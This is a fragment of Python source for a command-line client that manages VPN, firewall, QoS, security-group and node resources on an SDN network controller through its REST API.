self.create_parser.add_argument('-t', '--transform-protocol', choices=['ESP','AH','AH-ESP'])\n\n        self.update_parser.add_argument('-a', '--auth-algorithm', choices=['sha1','sha256','sha384','sha512'])\n        self.update_parser.add_argument('-e', '--encryption-algorithm', choices=['3des','aes-128','aes-192','aes-256'])\n        self.update_parser.add_argument('-t', '--transform-protocol', choices=['ESP','AH','AH-ESP'])\n        parser.set_defaults(func=self.cmd_ipsec)\n\n    def cmd_ipsec(self, args):\n        debug_out('cmd_ipsec: ', args)\n        
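# Mirrors cmd_ike above: selections are copied verbatim onto the\n        # ipsec_policy resource; options left unset are suppressed by argparse.\n        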
self.cmd_base(args)\n        if 'auth_algorithm' in args:\n            self.res.auth_algorithm = args.auth_algorithm\n        if 'encryption_algorithm' in args:\n            self.res.encryption_algorithm = args.encryption_algorithm\n        if 'transform_protocol' in args:\n            self.res.transform_protocol = args.transform_protocol\n        self.cmd_action()\n\nclass parser_endpoint(parser_base):\n    def __init__(self, parser):\n        super().__init__(parser)\n        self.res = VpnEndpiointGroup()\n        self.create_parser.add_argument('-e', '--endpoints', metavar='PREFIX', required=True, nargs='+', help='PREFIX list')\n        self.create_parser.add_argument('-t', '--endpoint-type', required=True, choices=['local','remote'])\n        parser.set_defaults(func=self.cmd_endpoint)\n\n    def cmd_endpoint(self, args):\n        debug_out('cmd_endpoint: ', args)\n        self.cmd_base(args)\n        if 'endpoints' in args:\n            self.res.endpoints = args.endpoints\n        if 'endpoint_type' in args:\n            self.res.endpoint_type = args.endpoint_type\n        self.cmd_action()\n\nclass parser_service(parser_base):\n    def __init__(self, parser):\n        super().__init__(parser)\n        self.res = VpnService()\n        self.create_parser.add_argument('-r', '--router', required=True, help='Router the VPN service will be associated with')\n        parser.set_defaults(func=self.cmd_service)\n\n    def cmd_service(self, args):\n        debug_out('cmd_service: ', args)\n        self.cmd_base(args)\n        if 'router' in args:\n            self.res.router = self.name_to_id(Router(), args.router)\n        self.cmd_action()\n\nclass parser_connection(parser_base):\n    def __init__(self, parser):\n        super().__init__(parser)\n        self.res = VpnConnection()\n        self.create_parser.add_argument('--ike', required=True, help='IKE policy')\n        self.create_parser.add_argument('--ipsec', required=True, help='IpSec policy')\n        self.create_parser.add_argument('-s', '--service', required=True, help='VPN service')\n        self.create_parser.add_argument('--peer-ip', required=True, help='Peer gateway IP')\n        self.create_parser.add_argument('--peer-id', required=True, help='Peer ID, usually same as peer ip')\n        self.create_parser.add_argument('--psk', required=True, help='Pre-shared key')\n        self.create_parser.add_argument('-l', '--local-endpoint', required=True, help='Local endpoint')\n        self.create_parser.add_argument('-p', '--peer-endpoint', required=True, help='Peer endpoint')\n        parser.set_defaults(func=self.cmd_connection)\n\n    def cmd_connection(self, args):\n        debug_out('cmd_connection: ', args)\n        self.cmd_base(args)\n        if 'ike' in args:\n            self.res.ike = self.name_to_id(IkePolicy(), args.ike)\n        if 'ipsec' in args:\n            self.res.ipsec = self.name_to_id(IpsecPolicy(), args.ipsec)\n        if 'service' in args:\n            self.res.service = self.name_to_id(VpnService(), args.service)\n        if 'peer_ip' in args:\n            self.res.peer_ip = args.peer_ip\n        if 'peer_id' in args:\n            self.res.peer_id = args.peer_id\n        if 'psk' in args:\n            self.res.psk = args.psk\n        if 'local_endpoint' in args:\n            self.res.local_endpoint = self.name_to_id(VpnEndpiointGroup(), args.local_endpoint)\n        if 'peer_endpoint' in args:\n            self.res.peer_endpoint = self.name_to_id(VpnEndpiointGroup(), args.peer_endpoint)\n        self.cmd_action()\n\nclass parser_p2s(parser_base):\n    def __init__(self, parser):\n        super().__init__(parser)\n        self.res = VpnP2SConnection()\n        self.create_parser.add_argument('-a', '--auth-mode', help='\"cert\" only')\n        self.create_parser.add_argument('--ca', help='CA cert, pem format')\n        self.create_parser.add_argument('-k', '--server-key', help='Private key in server, pem format')\n        self.create_parser.add_argument('-c', '--server-cert', help='Server cert, pem format')\n        
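# Certificate material is passed inline as PEM text; per the --auth-mode\n        # help above, certificate auth is the only supported p2s mode.\n        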
self.create_parser.add_argument('-e', '--exp-list', help='Expired cert list, pem format')\n        self.create_parser.add_argument('-v', '--vpn-service', help='VPN Service')\n        self.create_parser.add_argument('-s', '--local-subnets', nargs='+', help='Prefixes clients can access; must be connected to the router.')\n        self.create_parser.add_argument('-p', '--pool', nargs='+', help='Address pool for clients; must not overlap router subnets. At most one v4 and one v6')\n        self.update_parser.add_argument('--ca', help='CA cert, pem format')\n        self.update_parser.add_argument('-k', '--server-key', help='Private key in server, pem format')\n        self.update_parser.add_argument('-c', '--server-cert', help='Server cert, pem format')\n        self.update_parser.add_argument('-e', '--exp-list', help='Expired cert list, pem format')\n        msg = '''{action/interval/timeout}\n        action: clear, hold, restart, disabled or restart-by-peer, default hold\n        interval: default 30s\n        timeout: default 120s\n        '''\n        self.create_parser.add_argument('--dpd', help=msg)\n        self.create_parser.add_argument('--mss', help='TCP mss, default 1200')\n        parser.set_defaults(func=self.cmd_p2s)\n\n    def cmd_p2s(self, args):\n        debug_out('cmd_p2s: ', args)\n        self.cmd_base(args)\n        if 'auth_mode' in args:\n            self.res.auth_mode = args.auth_mode\n        if 'ca' in args:\n            self.res.cert = args.ca\n        if 'vpn_service' in args:\n            self.res.service = self.name_to_id(VpnService(), args.vpn_service)\n        if 'server_key' in args:\n            self.res.server_key = args.server_key\n        if 'server_cert' in args:\n            self.res.server_cert = args.server_cert\n        if 'exp_list' in args:\n            self.res.exp_cert_list = args.exp_list\n        if 'local_subnets' in args:\n            self.res.local_subnets = args.local_subnets\n        if 'pool' in args:\n            self.res.address_pool = args.pool\n        if 'mss' in args:\n            self.res.tcp_mss = args.mss\n        if 'dpd' in args:\n            self.res.dpd = json.loads(args.dpd)\n        self.cmd_action()\n\nclass parser_fw(parser_base):\n    def __init__(self, parser):\n        self.parser = parser\n        subparser = self.parser.add_subparsers()\n        firewall = subparser.add_parser('firewall', help='Firewall group')\n        parser_firewall(firewall)\n        policy = subparser.add_parser('policy', help='Firewall policy')\n        parser_policy(policy)\n        rule = subparser.add_parser('rule', help='Policy rule')\n        parser_fwrule(rule)\n        parser.set_defaults(func=self.cmd_fw)\n\n    def cmd_fw(self, args):\n        self.parser.print_usage()\n\nclass parser_firewall(parser_base):\n    def __init__(self, parser):\n        super().__init__(parser)\n        self.res = Firewall()\n        self.create_parser.add_argument('-p', '--policy', nargs='+', help='Policy to be associated')\n        self.create_parser.add_argument('--project', nargs='+', help='Project to be associated')\n        self.create_parser.add_argument('--network', nargs='+', help='Network to be associated')\n        self.create_parser.add_argument('--port', nargs='+', help='Port to be associated')\n\n        self.update_parser.add_argument('-p', '--policy', nargs='+', help='Policy to be associated')\n        self.update_parser.add_argument('--project', nargs='+', help='Project to be associated')\n        self.update_parser.add_argument('--network', nargs='+', help='Network to be associated')\n        self.update_parser.add_argument('--port', nargs='+', help='Port to be associated')\n\n        parser.set_defaults(func=self.cmd_firewall)\n\n    def cmd_firewall(self, args):\n        debug_out('cmd_firewall: ', args)\n        self.cmd_base(args)\n        if 'policy' in args:\n            self.res.policys = [self.name_to_id(FwPolicy(), p) for p in args.policy]\n        if 'project' in args:\n            self.res.projects = args.project\n        if 'network' in args:\n            self.res.networks
= [self.name_to_id(VirtualNetwork(), n) for n in args.network]\n if 'port' in args:\n self.res.ports = [self.name_to_id(Port(), p) for p in args.port]\n self.cmd_action()\n\nclass parser_policy(parser_base):\n def __init__(self, parser):\n super().__init__(parser)\n self.res = FwPolicy()\n self.create_parser.add_argument('-r', '--rules', nargs='+', help='Rule to be associated')\n self.create_parser.add_argument('--audited', type=bool)\n self.update_parser.add_argument('-r', '--rules', nargs='+', help='Rule to be associated')\n self.update_parser.add_argument('--audited', type=bool)\n self.insert_parser = self.operparser.add_parser('insert', argument_default=argparse.SUPPRESS, help='insert a rule')\n self.insert_parser.add_argument('--oper', default='insert', help=argparse.SUPPRESS)\n self.insert_parser.add_argument('-r', '--rule')\n self.insert_parser.add_argument('name', metavar='NAME', help='Name or ID to be updated')\n self.insert_parser.add_argument('-b', '--before', metavar='RULE', help='Insert before this rule')\n self.insert_parser.add_argument('-a', '--after', metavar='RULE', help='Insert after this rule')\n self.remove_parser = self.operparser.add_parser('remove', argument_default=argparse.SUPPRESS, help='remove a rule')\n self.remove_parser.add_argument('--oper', default='remove', help=argparse.SUPPRESS)\n self.remove_parser.add_argument('name', metavar='NAME', help='Name or ID to be updated')\n self.remove_parser.add_argument('-r', '--rule', metavar='RULE', help='Remove this rule')\n parser.set_defaults(func=self.cmd_policy)\n\n def cmd_policy(self, args):\n debug_out('cmd_policy: ', args)\n self.cmd_base(args)\n if 'rules' in args:\n self.res.rules = [self.name_to_id(FwRule(), r) for r in args.rules]\n if 'audited' in args:\n self.res.audited = args.audited\n if 'rule' in args:\n self.res.rule = self.name_to_id(FwRule(), args.rule)\n if 'before' in args:\n self.res.insert_before = self.name_to_id(FwRule(), args.before)\n if 'after' in args:\n self.res.resource['insert_after'] = self.name_to_id(FwRule(), args.after)\n self.cmd_action()\n\nclass parser_fwrule(parser_base):\n def __init__(self, parser):\n super().__init__(parser)\n self.res = FwRule()\n self.create_parser.add_argument('--src-ip', help='Source IP to be matched')\n self.create_parser.add_argument('--src-port', help='Source port to be matched')\n self.create_parser.add_argument('--dest-ip', help='Destination IP to be matched')\n self.create_parser.add_argument('--dest-port', help='Destination port to be matched')\n self.create_parser.add_argument('-p', '--protocol', help='Protocol to be matched')\n self.create_parser.add_argument('-v', '--version', choices=['4','6'])\n self.create_parser.add_argument('--action', choices=['deny','allow'])\n parser.set_defaults(func=self.cmd_rule)\n\n def cmd_rule(self, args):\n debug_out('cmd_rule: ', args)\n self.cmd_base(args)\n if 'src_ip' in args:\n self.res.src_ip = args.src_ip\n if 'src_port' in args:\n self.res.src_port = args.src_port\n if 'dest_ip' in args:\n self.res.dest_ip = args.dest_ip\n if 'dest_port' in args:\n self.res.dest_port = args.dest_port\n if 'protocol' in args:\n self.res.protocol = args.protocol\n if 'version' in args:\n self.res.version = args.version\n if 'action' in args:\n self.res.action = args.action\n self.cmd_action()\n\nclass parser_qos(parser_base):\n def __init__(self, parser):\n self.parser = parser\n subparser = self.parser.add_subparsers()\n ratelimit = subparser.add_parser('ratelimit', help='Qos configuration')\n parser_ratelimit(ratelimit)\n 
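# 'ratelimit' defines the Qos policy itself; 'ipgroup' below scopes a rate\n        # limit to specific IPs and ports rather than a whole port or network.\n        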
ipgroup = subparser.add_parser('ipgroup', help='IP group rate limit')\n        parser_ipgroup(ipgroup)\n        parser.set_defaults(func=self.cmd_qos)\n\n    def cmd_qos(self, args):\n        self.parser.print_usage()\n\nclass parser_ratelimit(parser_base):\n    def __init__(self, parser):\n        super().__init__(parser)\n        self.res = Qos()\n        self.create_parser.add_argument('-d', '--direction', choices=['ingress','egress'])\n        self.create_parser.add_argument('--dscp', nargs='*', help='Dscp marking rules')\n        self.create_parser.add_argument('-r', '--rate', help='Max rate with bit')\n        self.update_parser.add_argument('-r', '--rate', help='Max rate with bit')\n        self.update_parser.add_argument('--dscp', nargs='*', help='Dscp marking rules')\n        parser.set_defaults(func=self.cmd_ratelimit)\n\n    def cmd_ratelimit(self, args):\n        debug_out('cmd_ratelimit: ', args)\n        self.cmd_base(args)\n        if 'direction' in args:\n            self.res.direction = args.direction\n        if 'rate' in args:\n            self.res.rate = args.rate\n        if 'dscp' in args:\n            self.res.resource['dscp_marking_rules'] = args.dscp\n        self.cmd_action()\n\nclass parser_ipgroup(parser_base):\n    def __init__(self, parser):\n        super().__init__(parser)\n        self.res = IpGroup()\n        self.create_parser.add_argument('-n', '--net', help='Network to be ratelimited')\n        self.create_parser.add_argument('--ip', nargs='+', help='IP addresses to be ratelimited')\n        self.create_parser.add_argument('-p', '--protocol', choices=['tcp','udp'])\n        self.create_parser.add_argument('--port', nargs='+', help='TCP/UDP port')\n        self.create_parser.add_argument('-r', '--ratelimit', help='Qos rate limit to be associated')\n\n        self.update_parser.add_argument('--ip', nargs='+', help='IP addresses to be ratelimited')\n        self.update_parser.add_argument('-p', '--protocol', choices=['tcp','udp'])\n        self.update_parser.add_argument('--port', nargs='+', help='TCP/UDP port')\n        self.update_parser.add_argument('-r', '--ratelimit', help='Qos rate limit to be associated')\n        parser.set_defaults(func=self.cmd_ipgroup)\n\n    def cmd_ipgroup(self, args):\n        debug_out('cmd_ipgroup: ', args)\n        self.cmd_base(args)\n        if 'net' in args:\n            self.res.net = self.name_to_id(VirtualNetwork(), args.net)\n        if 'ip' in args:\n            self.res.ip = args.ip\n        if 'protocol' in args:\n            self.res.protocol = args.protocol\n        if 'port' in args:\n            # --port carries TCP/UDP port numbers, passed through as-is.\n            self.res.port = args.port\n        if 'ratelimit' in args:\n            self.res.ratelimit = args.ratelimit\n        self.cmd_action()\n\nclass parser_sg(parser_base):\n    def __init__(self, parser):\n        self.parser = parser\n        subparser = self.parser.add_subparsers()\n        group = subparser.add_parser('group', help='Security group')\n        parser_group(group)\n        rule = subparser.add_parser('rule', help='Security group rule')\n        parser_sgrule(rule)\n        parser.set_defaults(func=self.cmd_sg)\n\n    def cmd_sg(self, args):\n        self.parser.print_usage()\n\nclass parser_group(parser_base):\n    def __init__(self, parser):\n        super().__init__(parser)\n        self.res = SecurityGroup()\n        self.create_parser.add_argument('-d', '--direction', choices=['ingress', 'egress'])\n        self.create_parser.add_argument('-a', '--action', choices=['accept', 'deny'], nargs='+', help='Action for matched traffic')\n        self.create_parser.add_argument('-p', '--protocol')\n        self.create_parser.add_argument('--port', type=RANGE, metavar='MIN:MAX', help='TCP/UDP port')\n        self.create_parser.add_argument('--priority', help='Priority of this rule')\n        self.create_parser.add_argument('-v', '--ethertype', choices=['IPv4', 'IPv6'], help='Ethernet type of this rule')\n\n        parser.set_defaults(func=self.cmd_group)\n\n    def cmd_group(self, args):\n        debug_out('cmd_group: ', args)\n        self.cmd_base(args)\n        rule = {}\n        if 'direction' in args:\n            rule['direction'] = args.direction\n        if 'action' in args:\n            rule['action'] = args.action\n        if 'protocol' in args:\n            rule['protocol'] = args.protocol\n        if 'port' in args:\n            rule['port'] = args.port\n        if 'priority' in args:\n            rule['priority'] = args.priority\n        if 'ethertype' in args:\n            rule['ethertype'] = args.ethertype\n        if rule:\n            self.res.rules = [rule]\n        self.cmd_action()\n\nclass parser_sgrule(parser_base):\n    def __init__(self, parser):\n        super().__init__(parser)\n        self.res = SecurityGroupRule()\n        self.create_parser.add_argument('-d', '--direction', choices=['ingress', 'egress'])\n        self.create_parser.add_argument('-a', '--action', choices=['accept', 'deny'], nargs='+', help='Action for matched traffic')\n        self.create_parser.add_argument('-p', '--protocol')\n        self.create_parser.add_argument('--port', type=RANGE, metavar='MIN:MAX', help='TCP/UDP port')\n        self.create_parser.add_argument('--priority', help='Priority of this rule')\n        self.create_parser.add_argument('-v', '--ethertype', choices=['IPv4', 'IPv6'])\n        self.create_parser.add_argument('--enable', type=BOOL)\n        self.create_parser.add_argument('--group', help='Security group associated with')\n\n        self.update_parser.add_argument('-d', '--direction', choices=['ingress', 'egress'])\n        self.update_parser.add_argument('-a', '--action', choices=['accept', 'deny'], nargs='+', help='Action for matched traffic')\n        self.update_parser.add_argument('-p', '--protocol')\n        self.update_parser.add_argument('--port', type=RANGE, metavar='MIN:MAX', help='TCP/UDP port')\n        self.update_parser.add_argument('--priority', help='Priority of this rule')\n        self.update_parser.add_argument('-v', '--ethertype', choices=['IPv4', 'IPv6'])\n        self.update_parser.add_argument('--enable', type=BOOL)\n        parser.set_defaults(func=self.cmd_rule)\n\n    def cmd_rule(self, args):\n        debug_out('cmd_rule: ', args)\n        self.cmd_base(args)\n        if 'direction' in args:\n            self.res.resource['direction'] = args.direction\n        if 'action' in args:\n            self.res.resource['action'] = args.action\n        if 'protocol' in args:\n            self.res.resource['protocol'] = args.protocol\n        if 'port' in args:\n            self.res.resource['port'] = args.port\n        if 'priority' in args:\n            self.res.resource['priority'] = args.priority\n        if 'ethertype' in args:\n            self.res.resource['ethertype'] = args.ethertype\n        if 'enable' in args:\n            self.res.resource['enabled'] = args.enable\n        if 'group' in args:\n            self.res.resource['security_group_id'] = self.name_to_id(SecurityGroup(), args.group)\n        self.cmd_action()\n\nclass parser_provider(parser_base):\n    def __init__(self, parser):\n        super().__init__(parser)\n        self.res = Provider()\n        self.create_parser.add_argument('-i', '--interfaces', type=kv, metavar='HOST=NIC', nargs='+', help='Interface for public network')\n        self.update_parser.add_argument('-i', '--interfaces', type=kv, metavar='HOST=NIC', nargs='+', help='Interface for public network')\n        self.list_parser.add_argument('--nic', action='store_true', help='Show nic status of provider')\n        parser.set_defaults(func=self.cmd_provider)\n\n    def cmd_provider(self, args):\n        debug_out(sys._getframe().f_code.co_name, ': ', args)\n        self.cmd_base(args)\n        if 'interfaces' in args:\n            interfaces = []\n            for intf in args.interfaces:\n                i = intf.split('=')\n                interfaces.append({'host': i[0], 'nic': i[1]})\n            self.res.interfaces = interfaces\n        self.cmd_action()\n\n    def cmd_list(self, args):\n        if 'nic' in args:\n            self.res.url = '/neutron/provider_nic_status'\n        super().cmd_list(args)\n\nclass parser_nodes():\n    def __init__(self, parser):\n        self.res = ResBase()\n        self.action = None\n\n        self.parser = parser\n        self.parser.add_argument('--type', required=True, choices=['vrouter', 'control', 'config', 'configdb', 'analytics', 'analyticsdb'], help='Stale node type')\n        self.operparser = parser.add_subparsers()\n        self.list_parser = self.operparser.add_parser('list')\n        self.list_parser.set_defaults(func=self.cmd_list)\n\n        self.delete_parser = self.operparser.add_parser('delete')\n        self.delete_parser.add_argument('--hostname', required=True, help='Hostname of stale vrouter')\n        #self.delete_parser.add_argument('--ip', required=True, help='IP of stale vrouter')\n        self.delete_parser.set_defaults(func=self.cmd_delete)\n\n    def cmd_list(self, args):\n        debug_out(sys._getframe().f_code.co_name, ': ', args)\n        nodes_map = {'vrouter': 'virtual-routers', 'control': 'bgp-routers', 'config': 'config-nodes',\n                     'configdb': 'config-database-nodes', 'analytics': 'analytics-nodes', 'analyticsdb': 'database-nodes'}\n        self.res.url = '/' + nodes_map[args.type]\n        self.action = ResourceAction(self.res)\n        self.action.get()\n\n    def cmd_delete(self, args):\n        nodes_map = {'vrouter': 'virtual-router', 'control': 'bgp-router', 'config': 'config-node',\n                     'configdb': 'config-database-node', 'analytics': 'analytics-node', 'analyticsdb': 'database-node'}\n        default_fq = ['default-global-system-config', args.hostname]\n        nodes_fqname = {'vrouter': default_fq, 'config': default_fq, 'configdb': default_fq, 'analytics': default_fq, 'analyticsdb': default_fq,\n                        'control': ['default-domain', 'default-project', 'ip-fabric', '__default__', args.hostname]}\n        debug_out('cmd_delete: ', args)\n        self.action = ResourceAction(self.res)\n        res_id = self.action.fqname_to_id(nodes_map[args.type], nodes_fqname[args.type])\n        if not res_id:\n            print(f'error: node {args.hostname} not found')\n            return\n        # delete node\n        if args.type == 'vrouter':\n            # delete vmi for vrouter\n            vmi = default_fq + ['vhost0']\n            vmi_id = self.action.fqname_to_id('virtual-machine-interface', vmi)\n            if vmi_id:\n                self.res.url = f\"/virtual-machine-interface/{vmi_id['uuid']}\"\n                self.action.set_res(self.res)\n                self.action.delete()\n        self.res.url = f\"/{nodes_map[args.type]}/{res_id['uuid']}\"\n        self.action.set_res(self.res)\n        self.action.delete()\n\nclass parser_node(parser_base):\n    def __init__(self, parser):\n        super().__init__(parser)\n        self.res = Node()\n\nclass parser_prouter(parser_base):\n    def __init__(self, parser):\n        super().__init__(parser)\n        self.res = PhysicalRouter()\n        self.create_parser.add_argument('-m', '--mgmt-ip', help='Management IP of switch')\n        self.create_parser.add_argument('-c', '--community', help='Community for snmp read')\n        self.create_parser.add_argument('--router-type', choices=['embedded', 'tor-agent', 'tor-service-node'], help='Physical router type')\n        self.create_parser.add_argument('--check', type=BOOL, help='Physical router connection check')\n        self.update_parser.add_argument('-c', '--community', help='Community for snmp read')\n        self.update_parser.add_argument('--router-type', choices=['embedded', 'tor-agent', 'tor-service-node'], help='Physical router type')\n        self.update_parser.add_argument('--check', type=BOOL, help='Physical router connection check')\n        parser.set_defaults(func=self.cmd_prouter)\n\n    def cmd_prouter(self, args):\n        debug_out(sys._getframe().f_code.co_name, ': ', args)\n        self.cmd_base(args)\n        if 'mgmt_ip' in args:\n            self.res.mgmt_ip = args.mgmt_ip\n        if 'community' in args:\n            self.res.snmp = {'v2_community': args.community}\n        if 'router_type' in args:\n            self.res.router_type = args.router_type\n        if 'check' in args:\n            self.res.check = args.check\n        self.cmd_action()\n\nclass parser_tag(parser_base):\n    def __init__(self, parser):\n        super().__init__(parser)\n        self.res = Tag()\n        self.create_parser.add_argument('--type', help='type name')\n        self.create_parser.add_argument('--value', help='tag value string')\n        self.update_parser.add_argument('--type', help='type name')\n        self.update_parser.add_argument('--value', help='tag value string')\n        parser.set_defaults(func=self.cmd_tag)\n\n    def cmd_tag(self, args):\n        debug_out('cmd_tag: ', args)\n        self.cmd_base(args)\n        if 'type' in args:\n            self.res.type_name = args.type\n        if 'value' in args:\n            self.res.value = args.value\n        self.cmd_action()\n\nclass parser_address_group(parser_base):\n    def __init__(self, parser):\n        super().__init__(parser)\n        self.res = AddressGroup()\n        self.create_parser.add_argument('--prefixes', nargs='*', help='list of prefix uuid')\n        self.update_parser.add_argument('--prefixes', nargs='*', help='list of prefix uuid')\n        parser.set_defaults(func=self.cmd_address_group)\n\n    def cmd_address_group(self, args):\n        debug_out(sys._getframe().f_code.co_name, ': ', args)\n        self.cmd_base(args)\n        if 'prefixes' in args:\n            self.res.resource['prefixes'] = args.prefixes\n        self.cmd_action()\n\nclass parser_service_group(parser_base):\n    def __init__(self, parser):\n        super().__init__(parser)\n        self.res = ServiceGroup()\n        self.create_parser.add_argument('--services', nargs='*', metavar='{\"protocol\":value,\"port\":value}', type=json.loads, help='protocol support: TCP/UDP/ICMP')\n        self.update_parser.add_argument('--services', nargs='*', metavar='{\"protocol\":value,\"port\":value}', type=json.loads, help='protocol support: TCP/UDP/ICMP')\n        parser.set_defaults(func=self.cmd_service_group)\n\n    def cmd_service_group(self, args):\n        debug_out(sys._getframe().f_code.co_name, ': ', args)\n        self.cmd_base(args)\n        if 'services' in args:\n            self.res.resource['services'] = args.services\n        self.cmd_action()\n\nclass parser_seg_fw(parser_base):\n    def __init__(self, parser):\n        self.parser = parser\n        subparser = self.parser.add_subparsers()\n        firewall = subparser.add_parser('firewall', help='Firewall group')\n        parser_seg_firewall(firewall)\n        policy = subparser.add_parser('policy', help='Firewall policy')\n        parser_seg_policy(policy)\n        rule = subparser.add_parser('rule', help='Policy rule')\n        parser_seg_fwrule(rule)\n        parser.set_defaults(func=self.cmd_fw)\n\n    def cmd_fw(self, args):\n        self.parser.print_usage()\n\nclass parser_seg_firewall(parser_base):\n    def __init__(self, parser):\n        super().__init__(parser)\n        self.res = SegFirewall()\n        self.create_parser.add_argument('-t', '--tag', nargs='?', help='Tag to be associated')\n        self.create_parser.add_argument('-p', '--policy', nargs='*', help='Policy to be associated')\n        self.update_parser.add_argument('-t', '--tag', nargs='?', help='Tag to be associated')\n        self.update_parser.add_argument('-p', '--policy', nargs='*', help='Policy to be associated')\n        parser.set_defaults(func=self.cmd_firewall)\n\n    def cmd_firewall(self, args):\n        debug_out('cmd_firewall: ', args)\n        self.cmd_base(args)\n        if 'policy' in args:\n            self.res.resource['firewall_policys'] = [self.name_to_id(SegFirewallPolicy(), p) for p in args.policy]\n        if 'tag' in args:\n            self.res.resource['tag'] = args.tag\n        self.cmd_action()\n\nclass parser_seg_policy(parser_base):\n    def __init__(self, parser):\n        
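# Ordered rule list for a segment firewall policy; the 'insert'/'remove'\n        # subcommands below splice single rules relative to an existing one (-b/-a).\n        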
super().__init__(parser)\n self.res = SegFirewallPolicy()\n self.create_parser.add_argument('-r', '--rules', nargs='*', help='Rule to be associated')\n self.update_parser.add_argument('-r', '--rules', nargs='*', help='Rule to be associated')\n self.insert_parser = self.operparser.add_parser('insert', argument_default=argparse.SUPPRESS, help='insert a rule')\n self.insert_parser.add_argument('--oper', default='insert', help=argparse.SUPPRESS)\n self.insert_parser.add_argument('-r', '--oper-rules', nargs='*')\n self.insert_parser.add_argument('name', metavar='NAME', help='Name or ID to be updated')\n self.insert_parser.add_argument('-b', '--before', metavar='RULE', help='Insert before this rule')\n self.insert_parser.add_argument('-a', '--after', metavar='RULE', help='Insert after this rule')\n self.remove_parser = self.operparser.add_parser('remove', argument_default=argparse.SUPPRESS, help='remove a rule')\n self.remove_parser.add_argument('--oper', default='remove', help=argparse.SUPPRESS)\n self.remove_parser.add_argument('name', metavar='NAME', help='Name or ID to be updated')\n self.remove_parser.add_argument('-r', '--oper-rules', nargs='*', metavar='RULE', help='Remove rules')\n parser.set_defaults(func=self.cmd_policy)\n\n def cmd_policy(self, args):\n debug_out('cmd_policy: ', args)\n self.cmd_base(args)\n if 'rules' in args:\n self.res.resource['firewall_rules'] = [self.name_to_id(SegFirewallRule(), r) for r in args.rules]\n if 'oper_rules' in args:\n self.res.resource['oper_rules'] = [self.name_to_id(SegFirewallRule(), r) for r in args.oper_rules]\n if 'before' in args:\n self.res.resource['insert_before'] = self.name_to_id(SegFirewallRule(), args.before)\n if 'after' in args:\n self.res.resource['insert_after']= self.name_to_id(SegFirewallRule(), args.after)\n self.cmd_action()\n\nclass parser_seg_fwrule(parser_base):\n def __init__(self, parser):\n super().__init__(parser)\n self.res = SegFirewallRule()\n self.create_parser.add_argument('-d', '--direction', choices=['<>', '<', '>'])\n self.create_parser.add_argument('--action', choices=['deny','pass'])\n self.create_parser.add_argument('--match-tags', nargs='*', help='Tags to be matched, available tags are:'\n 'application, deployment, tier, site')\n self.create_parser.add_argument('--service-group', help='Service Group name')\n self.create_parser.add_argument('--service', type=json.loads, metavar='{\"protocol\":value,'\n '\"src_port\":value,\"dst_port\":value}',\n help='Protocol supported:'\n 'ah, dccp, egp, esp, gre, igmp, ospf, pgm,'\n 'rsvp, sctp, udplite, vrrp, icmp6, icmp, tcp, udp, any')\n self.create_parser.add_argument('--endpoint1', type=json.loads, metavar='{\"address_group\":value,'\n '\"tags\":[values],\"network_id\":value,\"any\":bool}')\n self.create_parser.add_argument('--endpoint2', type=json.loads, metavar='{\"address_group\":value,'\n '\"tags\":[values],\"network_id\":value,\"any\":bool}')\n\n self.update_parser.add_argument('-d', '--direction', choices=['<>', '<', '>'])\n self.update_parser.add_argument('--action', choices=['deny','pass'])\n self.update_parser.add_argument('--match-tags', nargs='*', help='Tags to be matched, available tags are:'\n 'application, deployment, tier, site')\n self.update_parser.add_argument('--service-group', help='Service Group name')\n self.update_parser.add_argument('--service', type=json.loads, metavar='{\"protocol\":value,'\n '\"src_port\":value,\"dst_port\":value}',\n help='Protocol supported:'\n 'ah, dccp, egp, esp, gre, igmp, ospf, pgm,'\n 'rsvp, sctp, udplite, vrrp, 
icmp6, icmp, tcp, udp, any')\n self.update_parser.add_argument('--endpoint1', type=json.loads, metavar='{\"address_group\":value,'\n '\"tags\":[values],\"network_id\":value,\"any\":bool}')\n self.update_parser.add_argument('--endpoint2', type=json.loads, metavar='{\"address_group\":value,'\n '\"tags\":[values],\"network_id\":value,\"any\":bool}')\n parser.set_defaults(func=self.cmd_rule)\n\n def cmd_rule(self, args):\n debug_out('cmd_rule: ', args)\n self.cmd_base(args)\n if 'direction' in args:\n self.res.resource['direction'] = args.direction\n if 'action' in args:\n self.res.resource['action'] = args.action\n if 'match_tags' in args:\n self.res.resource['match_tags'] = args.match_tags\n if 'service_group' in args:\n self.res.resource['service_group'] = args.service_group\n if 'service' in args:\n self.res.resource['service'] = args.service\n if 'endpoint1' in args:\n self.res.resource['endpoint_1'] = args.endpoint1\n if 'endpoint2' in args:\n self.res.resource['endpoint_2'] = args.endpoint2\n self.cmd_action()\n\nclass ResourceAction():\n def __init__(self, res_obj):\n self.res = res_obj\n\n config = pasrse_config_file()\n if not config:\n raise Exception('Please generate auth.json for auth info')\n\n self.host = config['host']\n self.port = config['port']\n self.api = RestAPI(auth_host=config['auth_host'], auth_port=config['auth_port'], version=config['version'],\n user=config['user'], password=config['password'], project=config['project'])\n self.url = self.api.encode_url(host=self.host, port=self.port, uri=res_obj.url)\n\n def set_res(self, res_obj):\n self.res = res_obj\n self.url = self.api.encode_url(uri=res_obj.url)\n\n def log(self, msg):\n global format\n if output_format == 'json':\n result = json.dumps(msg, indent=4)\n else:\n result = Table(4)\n result.from_json(msg)\n out(result)\n\n def name_to_id(self, name):\n self.res.filters = { 'name' : name}\n oper = self.res.oper\n self.res.oper = 'READALL'\n res_id = []\n\n code, resources = self.api.req('post', self.url, self.res.body)\n if code != 200:\n raise Exception('Not able to get resource')\n for res in resources:\n res_name = res.get('name')\n if res_name == name:\n res_id.append((res['id'], res.get('fq_name', name)))\n\n idx = 0\n if len(res_id) > 1:\n print('@@ Found multiple %s:' % self.res.type)\n for i in range(len(res_id)):\n print(i, res_id[i])\n idx = input('Please select: ')\n idx = int(idx)\n if idx >= len(res_id):\n raise Exception('Your input not in scope')\n if not res_id:\n raise Exception('Error: %s %s Not Found' % (self.res.type, name))\n self.res.oper = oper\n return res_id[idx][0]\n\n def fqname_to_id(self, res_type, fqname):\n json_body = {'type': res_type, 'fq_name': fqname}\n self.url = self.api.encode_url('/fqname-to-id')\n code, ret = self.api.req('post', self.url, json_body)\n if code != 200:\n print(ret)\n return None\n return ret\n\n def post(self):\n if not self.res.id and self.res.oper != 'CREATE' and self.res.oper != 'READALL':\n try:\n self.res.id = self.name_to_id(self.res.name)\n except Exception as e:\n print(str(e))\n return\n\n code, result = self.api.req('post', self.url, self.res.body)\n if code != 200:\n print(result)\n return\n self.log(result)\n if isinstance(result, list):\n print('Total resources: %s' % len(result))\n\n def put(self):\n code, result = self.api.req('put', self.url, 